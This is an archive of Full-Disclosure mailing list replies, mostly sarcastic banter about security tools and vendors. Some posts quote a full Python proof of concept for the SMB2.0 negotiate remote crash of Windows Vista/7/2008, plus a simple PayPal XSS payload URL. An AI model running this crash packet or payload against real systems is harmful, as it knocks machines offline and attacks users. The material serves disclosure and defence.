Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Randal T. Rioux
On 2/4/2014 6:36 PM, Mark Litchfield wrote:
> On 2/4/2014 3:13 PM, security curmudgeon wrote:
>> : > This is not the behavior of the site as of 48 hours ago.
>>
>> : Let me check.  Normal registration should also be available? In fact I
>> : will remove the registration.
>> :
>> : The purpose of this whole registration in the first place was to allow
>> : for future postings I am going to make later this week that would only
>> : be available to registered users.  Not necessarily vulnerabilities, but
>> : useful "stuff" for pentesting.  Also all registered users would be given
>> : a 48 hours head start on any new vulnerabilities that I post in the
>> : future.
>>
>> Which is great, but I strongly recommend you allow a site-specific
>> registration for such purposes. Giving up one of the two dominant social
>> media accounts for it is excessive.

> I should add, I am all for constructive criticism.  But a public forum
> is not really the place.  Feel free to email me directly.

Yes, it is. This is a security forum. Your authentication mechanism is a
major security issue.

The damn thing should get its own CVE.

Think about it and you'll see the point.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] PRISM

2013-10-22 Thread Randal T. Rioux
░▄▄░░░
░█░░▀▀▄
█░░░▒▒▒▒▒░░█░░░
░░░█░░▄██▀▄▄░▄▄▄█░░
░▄▀▒▄▄▄▒░█▄▄█░░░██▄▄██░
█░▒█▒▄░▀▄▄▄▀█░░░▒░█
█░▒█░█▀▄▄░█▀▀▄░░▄▀▀▀▄▒█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀█░░█░
░░█░░░▀▄▀█▄▄░█▀▀▀▀▀█▀██░█░░
░░░███░░▀█▄▄▄█▄▄█▄░█░░░
█▀▀▄░█░░░█░█▀██░█░░
░▀▄░▀▀▄▄▄█▄█▄█▄█▄▀░░█░░
░░░▀▄▄░░░▒░░░█░
░░▀▀▄▄░▒▒█░
░░▀▄█░░

Gr

On 10/2/2013 4:52 AM, catsandd0gz.dinosaursandwh0...@hushmail.com wrote:
> Is anyone else super mad?

Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-28 Thread Randal T. Rioux
On 8/28/2011 6:52 PM, Juan Sacco wrote:

> This isn't a company making a big product, I'm doing this because I like
> doing it.

Good for you. I think that is great. But you are pretending to be a "big
company." Stop that.

I am happy to see you removed that silly donation-for-download scheme.

> I'm not forcing you to use my software, if you don't like it please
> don't waste bandwidth on it.

Fantastic advice.

> We are working on a JAVA version in order to support multi-platform,
> and because I really like to JAVA

I did too, until I learned how to program. Oracle's purchase/murder also
hastened my departure.

Might I suggest C++/Qt? :-)

Randy



Re: [Full-disclosure] International Master In Computer Security and Cyberwarfare

2011-05-26 Thread Randal T. Rioux
How can you expect to be taken seriously when your Web site doesn't have
pictures of attractive, multi-ethnic women in business attire pointing
at holographic displays of random binary digits?

Bah!

Randy


On 5/23/2011 10:10 AM, Mastere NIS wrote:
> Our master “/Network and Information security/” (N&IS) program is a
> springboard to a variety of exciting careers in security information
> ranging from computer network administrator, IT security expert or
> cyberwarfare expert for the Department of Defense to security officer in
> charge of the IT security in an international firm.
> 
> Through theoretical and practical study, the N&IS program will provide
> you with the skills and knowledge you need to work in today’s fast
> moving information security landscape. It is the only program of this
> kind in France as it offers a different and new approach to information
> security by considering the attacker’s view point. This program also
> offers you insight into advanced study options such as active auditing
> or cyber warfare techniques and concepts, helping you to choose your
> career path. Our program emphasizes hands-on, practical training
> providing you with an additional learning opportunity that is
> best-suited for real world demands.
> 
> The Specialized Master “N&IS” is a Post-master professional degree
> called in French “mastère spécialisé”. It is a very specialized and
> highly technical one-year study course taught in English. This program
> is aimed at international students with a bachelor’s Degree or
> equivalent in the following related fields: computer science, computer
> engineering, applied mathematics. It is opened to higher level students
> and experienced engineers in IT as well.
> 
> More information on the homepage
> of the International Master.



Re: [Full-disclosure] Stuxnet

2011-05-01 Thread Randal T. Rioux
On 05/01/2011 01:38 PM, satyam pujari wrote:

> *request* "Hello FD, Can anyone handle this guy please ?"

Allow me to spin this broken record again...

Censorship => Bad
E-Mail Filters => Good

Take control of your inbox and don't rely on others!

Randy



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
> Insecurity Research is happy to announce the release of version 2.5,
> get it now while it is still hot!


Oh! And you list the Dept. of Energy as a customer. I used to work
there, and still talk to a lot of the security offices for various
locations. They've never heard of it.

Also, did you get clearance from the DoE's Office of Public Affairs to
list them as a customer? They get touchy about that sort of stuff.

Randy



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
> Insecurity Research is happy to announce the release of version 2.5,
> get it now while it is still hot!
> 
> Insect Pro 2.5 is a penetration security auditing and testing software
> solution designed to allow organizations of all sizes mitigate,
> monitor and manage the latest security threats vulnerabilities.
> 
> We’re always working to improve Insect Pro and now the users obtain
> a new feature: A fully automated active web application security
> reconnaissance tool.
> 
> Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
> 
> We invite you to take a visual tour where you can find screenshots and
> videos, visit us now at http://www.insecurityresearch.com
> 
> There is no fixed price to get a copy, you can obtain the full version
> by making a minimum donation to keep us coding.
> 
> We are really thankful with the community!

I keep getting this error when trying to download:

"Please enter an amount greater than zero."

Can you fix that so I can test out the software? I'm really curious
about how much code was lifted from other projects. Nice logo though!

Thanks,
Randy


Re: [Full-disclosure] Your email message was blocked

2011-03-30 Thread Randal T. Rioux
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
> The following email message was *blocked* by Bell Aliant Content
> Filtering Device:
>   
>   *From:*     ra...@procyonlabs.com
>   *To:*       peter.mo...@bellaliant.ca
>   *Subject:*  Re: [Full-disclosure] SSL Capable NetCat and more
>   *Message:*  B4d93f5990001.0001.0003.mml
> 
> Because it may contain *unacceptable language*, or *inappropriate
> material*.  Please remove any unacceptable or inappropriate language and
> resend the message.
> 
> The blocked email will be automatically deleted after *5 days*.
> Content Rule: Policy Management (Inbound) : Block Common & Mild Profanity
> 
> r...@bellaliant.ca
> 

F**K YOU.

Here's a nickel - get yourself a real mail server.

Randy

-- 
Disclaimer:

By sending an email to ANY of my addresses you are agreeing that:

1. I am, by definition, "the intended recipient"
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an "Out of Office" reply on a mailing list, I will
social engineer your company
5. This notification overrides any disclaimer or statement of
confidentiality that may be included on your message

Further, you understand that if any of the following conditions are met
that you are indeed, a bag of douche:

1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting



Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-30 Thread Randal T. Rioux
On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
>> Beside that, scnc is written in pure-Perl, and is easily modifiable
>> by anyone. Such really simple (dumb?) stuff should not be written in
>> low-level languages such as C.
> 
> You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the "logic" of C/C++ and
is interpreted (as pointed out by others). Any code base can be
modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing
the wheel in lesser performing methods is great. Just don't disregard C.
To be honest, in my code auditing days, it was SO much easier to find
flaws in C/C++ than Perl, because Perl is just messy and ugly. Something
looks wrong, but it's right. Uggh!

But if you need to write something quick for an easy task, by all means,
hit the Perl.

It's like using Java to write large scale enterprise products. Who the
hell? Why? Portability is nice, but performance is better. Java belongs
in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy



Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Randal T. Rioux
Thought this would be appropriate :-)

http://xkcd.com/149/

On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
> What do you expect from a woman?
> 
> Rebecca, kindly make me a sandwich
> 
> On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>> I did apologise, no need to drag it out into the yard and beat it with a
>> stick lol.



Re: [Full-disclosure] OpenBSD Paradox

2010-12-15 Thread Randal T. Rioux
On 12/15/2010 5:00 PM, BMF wrote:
> 2010/12/15 musnt live :
>> What is this time to stop the press!
> 
> This fake broken English schtick is really stupid and annoying. Knock
> it off. In the meantime you are kill filed. I suggest everyone else do
> the same as nothing useful has ever come of this person.

First, obligatory:

http://www.pulledbyakite.com/funnypics/s_troll.jpg

Second, if you can't take a joke:

http://www.pulledbyakite.com/funnypics/gtfoti.png

Now let's hug and move on.

Randy



Re: [Full-disclosure] Windows is 100% self-modifying assembly code?(Interesting security theory)

2010-12-10 Thread Randal T. Rioux
On 12/10/2010 10:10 AM, John Horn wrote:
> Is this a joke?
> 
> 
> --
> 
> John Horn
> 
> City of Tucson, IT Department
> 
> Network Services (Network security)
> 
> Phone: (520) 837-6036
> 
> --
> 
> CONFIDENTIALITY NOTICE: If you have received this email in error,
> please immediately notify
> 
> the sender by e-mail at the address shown.  This email transmission
> may contain confidential information.
> 
> This information is intended only for the use of the individual(s) or
> entity to whom it is intended even if addressed incorrectly.
> 
> Please delete it from your files if you are not the intended
> recipient.  Thank you for your compliance, time and attention to this
> matter.


A top-post, bogus "legal" notice AND an office phone #.

Social engineers - unite!

Might want to think about that a little.

And if you have to ask whether something is a joke, then the troll was
successful.



Re: [Full-disclosure] Paypal XSS Vulnerability - Resolved

2010-03-27 Thread Randal T. Rioux
I find it humorous that an organization that pretends to be a bank and
regularly steals money from its members has the balls to distribute a
"PayPal Responsible Disclosure Policy."

Good luck with that.

Randy


On Fri, March 26, 2010 10:49 pm, Orbeton, Jon wrote:
> All:
>
> The XSS vulnerability reported below was addressed at approximately 17:45
> PDT today.
>
> For information about how to report security issues to PayPal, please
> refer to the PayPal Responsible Disclosure Policy documented here:
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside
>
> Site security issues should be reported to:
>   sitesecur...@paypal.com
>
> All reports will be handled professionally and quickly. A PGP key is
> available at the URL above.
>
>
> Thanks,
> Jon Orbeton
>
> PayPal, an eBay Company
>
> 
>
> From: Wesley Kerfoot 
> Date: Fri, 26 Mar 2010 15:46:09 -0400
>
> Paypal is affected by an XSS vulnerability where it fails to validate
> input for the following url:
>
> https://www.paypal.com/xclick/business=
>
> One can add arbitrary javascript with no need for any filter evasion.
>
> https://www.paypal.com/xclick/business= alert("xss");
> 
>
>
> As far as I know only the above url is affected. All of the usual XSS
> attacks will work with this.
>
> Cheers.
>
>




Re: [Full-disclosure] SecurityFocus to partially shut down

2010-03-12 Thread Randal T. Rioux
On Fri, March 12, 2010 1:45 pm, Michal Zalewski wrote:
>> http://www.securityfocus.com/news/11582
>
> "While the news portal section of SecurityFocus will no longer be
> offered, we think our readers will be better served by this change as
> we combine our efforts with Symantec Connect and continue to provide a
> valuable service to the community."
>
> http://www.symantec.com/connect/
>
> In other words, RIP :-/

Who didn't see this coming?

Symantec... OM NOM NOMMING companies since 1984.

Randy




Re: [Full-disclosure] How I become Vice President of Security at Yahoo! 1999-2005.

2010-02-19 Thread Randal T. Rioux
Decent attempt at trolling. Some beginner mistakes, but the message was
relayed as intended (I'm sure). Comments inline.

On Fri, February 19, 2010 6:45 pm, John Q Public wrote:
> -BEGIN PGP SIGNED MESSAGE- Hash: SHA1
>
> Greetings.
>
> I've been holding this one back for a while. It's been eating at my skin.
>
> I was just an intern at the time, but I'd get the mail, copy the text,
> delete his mail, and send the mail to my supervisor, authored by me.

Clarify the type of mail - it adds texture to the troll.

> I still remember the friendships I made at Yahoo. The cute girlfriends I
> have and how it changed my life. I remember I was just some office kid
> opening up emails in outlook 2000. But I risen to be so much more. This
> mysterious person helped me do it.

Perhaps some reflection on the type of assistance? Also, Yahoo! employees
do not have cute girlfriends.

> Eventually, I was promoted up Vice President of Security at Yahoo! and
> made nearly six figures a year.

The salary figure is off. Take into consideration the role, size of
organization and geographical location. Then again, the "experience" you
detailed would possibly justify this low figure.

> This is what I did. And I told no one. All I know is there is a kid whose
> advice I took credit for and he is the key factor for my success in life.
>
> I live in a $500k condo in Mountain View. Wife, 2 kids, and a Lexus (2009
> Hybrid, Italian leather seats, TV in backseat for the kids).

That amount in Mountain View would get you 20x20 in someone's basement.
Also, they don't make seats with the skin of Italian people. Some ethical
thing.

> I just wanted to let you know that the security tips helped. I feel
> pretty guilty for flat out taking credit for all his work though. I just
> had to get it off my chest.
>
> Thank you so much, if you read this list. You've touched my life.

> -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be
> verified at https://www.hushtools.com/verify Version: Hush 3.0

Hmm. Must be legit. It's signed!

Okay, break time is over. Back to code monkeying.

Randy




Re: [Full-disclosure] Peiter "Mudge" Zatko petition to be named U.S. Cybersecurity Chief

2009-09-17 Thread Randal T. Rioux
The Sp3ctacle wrote:
> http://www.ipetitions.com/petition/mudge4cyberczar/index.html
> 
> This petition is posted in support for the nomination of Peiter Zatko
> (aka mudge) to the President's post of Cybersecurity Chief. We've all
> seen how effective past efforts have been regarding this initiative,
> and realize the importance of nominating someone who understands not
> only all facets of cybersecurity, but has garnered the respect of both
> peers and adversaries in the space. Dr. Zatko's bio is available at:
> http://en.wikipedia.org/wiki/P... and
> http://www.allbusiness.com/gov...

Yeah, because if it is one thing he wants, it is a powerless figurehead 
position of bureaucracy and politics.

There is a reason why nobody stays in the high level (US) information 
security roles for long.

Randy



Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
> After testing my version of the exploit (using Java instead of Python) I
> tried it against a Windows Server 2008 R2 installation - it went down.
>
> http://www.procyonlabs.com/software/smb2_bsoder
>
> Randy
>
>
> laurent gaffie wrote:
>> Advisory updated :
>>
>>
>> =
>> - Release date: September 7th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: High
>> =
>>
>> I. VULNERABILITY
>> -
>> Windows Vista, Server 2008 < R2, 7 RC :
>> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> -
>> Windows Vista and newer Windows come with a new SMB version named SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> -
>> [Edit] Unfortunately this SMB2 security issue is specifically due to a MS
>> patch, for another SMB2.0 security issue:
>> KB942624 (MS07-063)
>> Installing only this specific update on Vista SP0 creates the following
>> issue:
>>
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a
>> SMB server, and it's used to identify the SMB dialect that will be used
>> for further communication.
>>
>> IV. PROOF OF CONCEPT
>> -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>>
>> from socket import socket
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> -
>> An attacker can remotely crash any Vista/Windows 7 machine with SMB
>> enabled.
>> Windows XP, 2k, are NOT affected as they don't have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> -
>> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
>> < R2, Windows 7 RC.
>>
>> VII. SOLUTION
>> -
>> No patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>> Configure your firewall properly
>> You can also follow the MS Workaround:
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>>
>> VIII. REFERENCES
>> -
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>>
>> IX. CREDITS
>> -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com>
>>
>> X. REVISION HISTORY
>> -
>> September 7th, 2009: Initial release
>> September 11th, 2009: Revision 1.0 release
>>
>> XI. LEGAL NOTICES
>> -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> XII.Personal Notes
>> -
>> Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> It won't be done, if they find a way to execute code, they will publish
>> their advisory.
>
>




Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
It's fun :-)


On Mon, September 14, 2009 12:14 pm, D-vice wrote:
> You wrote an exploit in java
>
>
> *head explodes*
>
> On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
> wrote:
>
>> After testing my version of the exploit (using Java instead of Python) I
>> tried it against a Windows Server 2008 R2 installation - it went down.
>>
>> http://www.procyonlabs.com/software/smb2_bsoder
>>
>> Randy
>>
>>
>> laurent gaffie wrote:
>> > Advisory updated :
>> >
>> >
>> > =
>> > - Release date: September 7th, 2009
>> > - Discovered by: Laurent Gaffié
>> > - Severity: High
>> > =
>> >
>> > I. VULNERABILITY
>> > -
>> > Windows Vista, Server 2008 < R2, 7 RC :
>> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>> >
>> > II. BACKGROUND
>> > -
>> > Windows Vista and newer Windows come with a new SMB version named SMB2.
>> > See:
>> > http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> > for more details.
>> >
>> > III. DESCRIPTION
>> > -
>> > [Edit] Unfortunately this SMB2 security issue is specifically due to a MS
>> > patch, for another SMB2.0 security issue:
>> > KB942624 (MS07-063)
>> > Installing only this specific update on Vista SP0 creates the following
>> > issue:
>> >
>> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> > PROTOCOL REQUEST functionality.
>> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a
>> > SMB server, and it's used to identify the SMB dialect that will be used
>> > for further communication.
>> >
>> > IV. PROOF OF CONCEPT
>> > -
>> >
>> > Smb-Bsod.py:
>> >
>> > #!/usr/bin/python
>> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>> >
>> > from socket import socket
>> >
>> > host = "IP_ADDR", 445
>> > buff = (
>> > "\x00\x00\x00\x90" # Begin SMB header: Session message
>> > "\xff\x53\x4d\x42" # Server Component: SMB
>> > "\x72\x00\x00\x00" # Negociate Protocol
>> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> > "\x30\x30\x32\x00"
>> > )
>> > s = socket()
>> > s.connect(host)
>> > s.send(buff)
>> > s.close()
>> >
>> > V. BUSINESS IMPACT
>> > -
>> > An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
>> > Windows XP, 2k, are NOT affected as they don't have this driver.
>> >
>> > VI. SYSTEMS AFFECTED
>> > -
>> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
>> > < R2, Windows 7 RC.
>> >
>> > VII. SOLUTION
>> > -
>> > No patch available for the moment.
>> > Close SMB feature and ports, until a patch is provided.
>> > Configure your firewall properly
>> > You can also follow the MS Workaround:
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> > VIII. REFERENCES
>> > -
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> http://blogs.technet.

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-13 Thread Randal T. Rioux
After testing my version of the exploit (using Java instead of Python) I 
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:
> Advisory updated :
> 
> 
> =
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: High
> =
> 
> I. VULNERABILITY
> -
> Windows Vista, Server 2008 < R2, 7 RC :
> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> 
> II. BACKGROUND
> -
> Windows Vista and newer Windows come with a new SMB version named SMB2.
> See: 
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
> 
> III. DESCRIPTION
> -
> [Edit] Unfortunately this SMB2 security issue is specifically due to a MS
> patch, for another SMB2.0 security issue:
> KB942624 (MS07-063)
> Installing only this specific update on Vista SP0 creates the following
> issue:
>
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
> PROTOCOL REQUEST functionality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a
> SMB server, and it's used to identify the SMB dialect that will be used
> for further communication.
> 
> IV. PROOF OF CONCEPT
> -
> 
> Smb-Bsod.py:
> 
> #!/usr/bin/python
> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> 
> from socket import socket
> 
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> 
> V. BUSINESS IMPACT
> -
> An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
> Windows XP, 2k, are NOT affected as they don't have this driver.
> 
> VI. SYSTEMS AFFECTED
> -
> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
> < R2, Windows 7 RC.
> 
> VII. SOLUTION
> -
> No patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
> Configure your firewall properly
> You can also follow the MS Workaround:
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> 
> VIII. REFERENCES
> -
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> 
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com 
> 
> X. REVISION HISTORY
> -
> September 7th, 2009: Initial release
> September 11th, 2009: Revision 1.0 release
> 
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
> 
> XII.Personal Notes
> -
> Many persons have suggested to update this advisory for RCE and not BSOD:
> It won't be done, if they find a way to execute code, they will publish 
> their advisory.
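
The advisory quoted above puts the malformed value in the "Process Id High" field of the SMB header of a NEGOTIATE PROTOCOL REQUEST and says the normal value is zero. As an added example (not part of the original post or of any tool linked in the thread), this Python parser reads a captured negotiate frame and reports a nonzero Process ID High; the offsets assume the fixed 32-byte SMB1 header layout, and the function names and sample frames are constructed for illustration.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB1_HEADER_LEN = 32          # fixed-size SMB1 header
NETBIOS_HEADER_LEN = 4        # 1 byte type + 3 bytes length


def parse_dialects(data):
    """Split the negotiate data block into dialect names.

    Each entry is a 0x02 buffer-format byte, an ASCII name and a NUL.
    """
    dialects, i = [], 0
    while i < len(data) and data[i] == 0x02:
        end = data.find(b"\x00", i + 1)
        if end == -1:          # unterminated entry: keep what parsed so far
            break
        dialects.append(data[i + 1:end].decode("ascii", "replace"))
        i = end + 1
    return dialects


def parse_negotiate(frame):
    """Return the fields of interest, or None if this is not an SMB1 negotiate."""
    if len(frame) < NETBIOS_HEADER_LEN + SMB1_HEADER_LEN + 3:
        return None
    smb = frame[NETBIOS_HEADER_LEN:]
    if frame[0] != 0x00 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    # Offset 9: Flags (1 byte), Flags2 (2 bytes), PIDHigh (2 bytes), little-endian.
    _flags, _flags2, pid_high = struct.unpack_from("<BHH", smb, 9)
    word_count = smb[SMB1_HEADER_LEN]
    bc_off = SMB1_HEADER_LEN + 1 + 2 * word_count
    if len(smb) < bc_off + 2:
        return None
    (byte_count,) = struct.unpack_from("<H", smb, bc_off)
    data = smb[bc_off + 2:bc_off + 2 + byte_count]
    return {
        "declared_len": int.from_bytes(frame[1:4], "big"),
        "actual_len": len(smb),
        "pid_high": pid_high,
        "dialects": parse_dialects(data),
    }


def findings(frame):
    """Return a list of human-readable findings for one captured frame."""
    info = parse_negotiate(frame)
    if info is None:
        return []
    out = []
    if info["pid_high"] != 0:
        offers_smb2 = any(d.startswith("SMB 2") for d in info["dialects"])
        out.append("nonzero PIDHigh 0x%04x in NEGOTIATE (SMB 2 dialect offered: %s)"
                   % (info["pid_high"], offers_smb2))
    if info["declared_len"] != info["actual_len"]:
        out.append("NetBIOS length %d does not match payload length %d"
                   % (info["declared_len"], info["actual_len"]))
    return out


def constructed_frame(pid_high, dialects):
    """Build an in-memory sample frame for the parser (constructed test input)."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB1_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",
        SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high,
        b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data
    return b"\x00" + len(body).to_bytes(3, "big") + body


if __name__ == "__main__":
    samples = {
        "zero PIDHigh": constructed_frame(0, ["NT LM 0.12", "SMB 2.002"]),
        "nonzero PIDHigh": constructed_frame(0x2600, ["NT LM 0.12", "SMB 2.002"]),
    }
    for name, frame in samples.items():
        print(name, "->", findings(frame) or "no findings")
```

The same field check can be expressed as an IDS rule on TCP/445; the parser form is convenient for reviewing packet captures after the fact.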



Re: [Full-disclosure] Slashdot hacked?

2009-07-23 Thread Randal T. Rioux
